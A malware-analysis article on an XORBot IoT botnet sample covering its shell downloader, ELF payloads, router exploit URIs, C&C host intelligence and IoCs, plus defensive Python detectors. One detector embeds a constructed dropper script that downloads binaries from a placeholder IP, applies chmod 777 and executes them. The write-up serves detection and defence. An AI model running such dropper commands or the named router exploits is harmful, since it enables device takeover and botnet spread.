Important elements of the analysis
- IoT botnet that targets several device types
- Exploits with malicious remote commands
- Anti-detection capabilities and detection bypass techniques
- Spreading via an SH (shell) downloader script
- wget commands to download botnet artifacts from the C&C IP address
- chmod 777 executions to set the needed permissions
- ELF threat artifacts
- Exploit activity using the dslf-config user
- Collection of kernel activity and CPU usage statistics
- C&C IP address hosted on a VPS
In this article we analyze an XORBot malware sample. XORBot is an IoT botnet that targets devices with exploits and malicious remote commands, and it provides anti-detection capabilities and detection bypass techniques. The threat comes with a spreader SH script that uses wget commands to download several botnet payloads targeting several device types, including Huawei, Netgear, D-Link and TP-Link.
The malicious downloader script begins by setting the $PATH variable to /usr/bin, /bin, /sbin, /usr/sbin, /usr/local/bin and /usr/local/sbin.
After the download operations with wget, the curl -O command is launched and the downloaded artifacts are saved in the /bin/busybox folder. The chmod 777 command is then used to grant all the needed permissions on them.
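The traits just described (a PATH override at the top of the script, wget and curl fetches from a bare IP address, staging under /bin/busybox and /tmp, and chmod 777 on the dropped files) are exactly what a triage scanner for shell droppers should key on. The following is an added example written for this article, not code from the sample or from the author; the script it scans is a constructed stand-in for a downloader of this kind, using the RFC 5737 documentation address 198.51.100.7 as a placeholder for the real C&C host, and the rule names and the three-rule threshold are this example's own assumptions.

```python
import re

# Constructed sample of a downloader-style shell script (NOT the real XORBot
# script; 198.51.100.7 is a documentation address used as a placeholder).
SAMPLE_SCRIPT = """#!/bin/sh
PATH=/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin
cd /tmp || cd /var/run
wget http://198.51.100.7/bins/sample.mips -O /bin/busybox/sample.mips
curl -O http://198.51.100.7/bins/sample.arm7
chmod 777 /bin/busybox/sample.mips
./sample.mips
"""

# Each rule is (name, regex). They mirror the traits described in the write-up:
# PATH (re)declaration, wget/curl fetches from a bare IPv4 address, staging
# under /bin/busybox or /tmp, and world-writable chmod on the payload.
RULES = [
    ("path_override", re.compile(r"^\s*(export\s+)?PATH=")),
    ("wget_from_ip", re.compile(r"\bwget\s+\S*https?://(\d{1,3}\.){3}\d{1,3}")),
    ("curl_from_ip", re.compile(r"\bcurl\s+(-\S+\s+)*https?://(\d{1,3}\.){3}\d{1,3}")),
    ("busybox_staging", re.compile(r"/bin/busybox")),
    ("chmod_777", re.compile(r"\bchmod\s+777\b")),
    ("tmp_staging", re.compile(r"\bcd\s+/tmp\b")),
]


def scan_script(text):
    """Return {rule_name: [matching 1-based line numbers]} for each rule that fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def download_hosts(text):
    """Distinct hosts fetched with wget/curl, ready for a blocklist or pivoting."""
    rx = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://([^/\s]+)")
    return sorted(set(rx.findall(text)))


def verdict(hits, threshold=3):
    """Heuristic: three or more distinct dropper traits is enough to escalate."""
    return "suspicious" if len(hits) >= threshold else "clean"


if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    for name, lines in sorted(found.items()):
        print(f"{name:18s} lines {lines}")
    print("hosts:", download_hosts(SAMPLE_SCRIPT))
    print("verdict:", verdict(found))
```

Run it against any captured shell artifact by swapping in the file contents; the line numbers in the output point an analyst straight at the fetch and chmod statements, and the extracted hosts feed a blocklist without anyone having to read the script by hand.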
I downloaded one of the artifacts to inspect it:
The artifact is an ELF malware binary compiled with GNU GCC (Debian pre-release):
Here are the details about the ELF file sections and the byte distribution:
The ELF file entropy is 6.04011, so it does not seem to be packed:
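The entropy figure above is Shannon entropy in bits per byte, where 8.0 means every byte value is equally likely (as in encrypted or well-compressed data) and unpacked native code typically lands well below that. The following is an added example, not code from the page or the author, that computes the same measure, classifies it, and also scans fixed-size windows, because a low whole-file entropy does not rule out a small packed or encrypted region inside an otherwise plain binary. The classification thresholds are a common rule of thumb and an assumption of this example, not a standard.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def windowed_entropy(data, window=4096):
    """Entropy of consecutive fixed-size windows as a list of (offset, bits)."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data), window)]


# Thresholds are an assumption of this example (a widely used heuristic, not a
# standard): plain native code usually sits around 5.5-6.5 bits/byte, while
# packed or encrypted payloads approach 8.0.
def classify(entropy):
    if entropy >= 7.2:
        return "likely packed or encrypted"
    if entropy >= 6.5:
        return "compressed or mixed high-entropy data"
    return "unpacked code/data"


def high_entropy_regions(data, window=4096, threshold=7.2):
    """Offsets of windows whose entropy crosses the packed/encrypted threshold."""
    return [off for off, e in windowed_entropy(data, window) if e >= threshold]


def analyze_file(path, window=4096):
    """Whole-file entropy plus any suspicious windows, for one ELF on disk."""
    with open(path, "rb") as fh:
        data = fh.read()
    total = shannon_entropy(data)
    return {
        "entropy": round(total, 5),
        "verdict": classify(total),
        "high_entropy_regions": high_entropy_regions(data, window),
    }


if __name__ == "__main__":
    import sys
    print(analyze_file(sys.argv[1]))
```

The sample's value of 6.04011 falls in the "unpacked code/data" band, which agrees with the observation above; the per-window list is the part worth keeping in a triage pipeline, since an embedded encrypted configuration or a second-stage blob will show up as one or two windows near 8.0 even when the file as a whole looks ordinary.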
Here we have several details about the exploitation of Huawei, Netgear and GPON devices and routers; the User-Agent is set to wget/1.21.1. We can also see a reference to /picsdesc.xml, which is related to the CVE-2014-8361 vulnerability, an arbitrary code execution flaw associated with Realtek.
Here we can see a GET request related to Netgear device configuration actions and references to the /tmp/huawei folder; there is also a detail linked to authorization as the user dslf-config, and NTP server configuration settings set with echo DEATH commands.
There is evidence of privilege escalation through the HNAP port by remote unauthenticated attackers, related to D-Link devices and associated with the purenetworks[.]com domain:
The GET requests below are associated with the Netgear.cfg configuration file. The commands are used to wipe the /tmp folder contents and to download content with wget over http:// (with a %s string placeholder for the value); there are spim references for executing MIPS32 assembly, and Netgear configuration attributes and parameters are opened through the currentsetting.htm page.
Here we have exploit references to Huawei Home Gateway devices that use the dslf-config user and the /ctrlt/DeviceUpgrade_1 URI:
The evidence of commands issued via GET requests to the URI /cgi-bin/luci relates to the exploitation of TP-Link devices. Some artifacts are obtained with GET requests to /.shell URIs.
The threat collects information about kernel activity and CPU usage statistics:
Looking more closely at the C&C IP address used to download further botnet artifacts, we see that 66.63.187[.]192 is registered in Germany to Virtualine Technologies and is a VPS. The main open ports are 22 (SSH), 80, 443 and 1944.
Relations to the ConnectWise ScreenConnect RAT are highlighted for this VPS IP address:
Other threat intelligence OSINT evidence shows a UK registration country and associations with bots, zombies, spam and Mirai C&C:
The IP address in question is also related to malicious port scanning activity:
The threat is recognized as malicious by OSINT sources and identified as BASH/Dloader.AAN!tr.dldr:
Here we can see several IDS rules that identify exploit attempts associated with GPON, Beetel Connection Manager username buffer overflow attempts, shellcode and suspicious user agents:
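The request paths named in the sections above (/ctrlt/DeviceUpgrade_1 for Huawei, /picsdesc.xml for the Realtek flaw, currentsetting.htm for Netgear, /cgi-bin/luci for TP-Link, /.shell for payload fetches) and the wget/1.21.1 User-Agent are the same signals the IDS rules shown here key on. The following is an added example, written for this article rather than taken from the page or from any IDS ruleset, that applies those signals to web-server access logs. The log lines are constructed, the client IPs are RFC 5737 documentation addresses, and the rule names, severities and the two-family scanner threshold are this example's assumptions. It also carries the caveat a practitioner wants: /cgi-bin/luci is a legitimate OpenWrt/TP-Link admin path, so on its own it only rates "low" and is escalated by corroborating signals such as a scripted client or the same source probing several device families.

```python
import re
from collections import defaultdict

# Constructed combined-format access log lines (not from the sample); the
# client addresses are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" 404 0 "-" "wget/1.21.1"
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /picsdesc.xml HTTP/1.1" 200 512 "-" "wget/1.21.1"
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /currentsetting.htm HTTP/1.1" 200 128 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jan/2024:10:00:04 +0000] "GET /cgi-bin/luci HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2024:10:00:06 +0000] "GET /.shell HTTP/1.1" 404 0 "-" "wget/1.21.1"
"""

LOG_RX = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# URI signatures taken from the paths discussed in the write-up, each with a
# base severity (severity labels are this example's assumption).
URI_RULES = [
    ("huawei_deviceupgrade", re.compile(r"^/ctrlt/DeviceUpgrade_1"), "high"),
    ("realtek_picsdesc", re.compile(r"^/picsdesc\.xml"), "high"),
    ("netgear_currentsetting", re.compile(r"/currentsetting\.htm"), "medium"),
    ("dot_shell_fetch", re.compile(r"^/\.shell\b"), "high"),
    ("luci_admin", re.compile(r"^/cgi-bin/luci\b"), "low"),  # legitimate path
]
SCRIPTED_UA = re.compile(r"^(wget|curl)/", re.I)
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RX.match(line)
    return m.groupdict() if m else None


def evaluate(entry):
    """Return (rule_names, severity) for one parsed request, or ([], None)."""
    names = [n for n, rx, _ in URI_RULES if rx.search(entry["uri"])]
    if not names:
        return [], None
    sev = max((s for n, _, s in URI_RULES if n in names), key=SEVERITY_RANK.get)
    # Corroboration: a scripted client (wget/curl User-Agent) on a device
    # admin or exploit path raises low -> medium and medium -> high.
    if SCRIPTED_UA.match(entry["ua"]) and sev != "high":
        names.append("scripted_user_agent")
        sev = "medium" if sev == "low" else "high"
    return names, sev


def analyze(log_text):
    """Per-request alerts plus the sources that probed two or more device families."""
    alerts, per_src = [], defaultdict(set)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        names, sev = evaluate(entry)
        if sev:
            alerts.append({"src": entry["src"], "uri": entry["uri"],
                           "rules": names, "severity": sev})
            per_src[entry["src"]].update(names)
    # One source hitting distinct device-family signatures is scanning for
    # targets, not a single misconfigured client.
    scanners = sorted(s for s, r in per_src.items()
                      if len(r - {"scripted_user_agent"}) >= 2)
    return alerts, scanners


if __name__ == "__main__":
    found, scanning = analyze(SAMPLE_LOG)
    for a in found:
        print(f'{a["severity"]:6s} {a["src"]:14s} {a["uri"]:26s} {a["rules"]}')
    print("scanning sources:", scanning)
```

On the constructed log this produces five alerts and flags 198.51.100.7 and 203.0.113.5 as scanners, while the browser hitting /cgi-bin/luci from 192.0.2.44 stays at "low"; in production the same source-correlation step is what keeps a rule on a legitimate admin path from paging anyone for routine router management.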
- 21f62daa3b03e3e79f60193c5aa00c3f
- b82e95f5c68e8bd3a93098c6da1ae55129cd9103
- d8287773e46c4afe3e1a826fcdcbdb645a7bc217d9b3fcc2300c40511d743b4f
- 66.63.187[.]192
- purenetworks[.]com
- IQghrApWdD6m7nDBVyHppAP6McFaT1FrYh